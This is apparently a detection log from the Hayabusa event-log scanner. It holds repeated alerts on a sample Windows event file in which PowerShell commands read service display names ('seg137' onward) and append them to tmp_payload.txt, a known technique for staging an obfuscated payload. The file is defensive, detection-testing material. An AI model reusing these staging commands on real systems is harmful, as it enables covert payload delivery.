2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:14.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:15.662 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:17.100 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:17.116 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg158"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:38:18.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg159"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
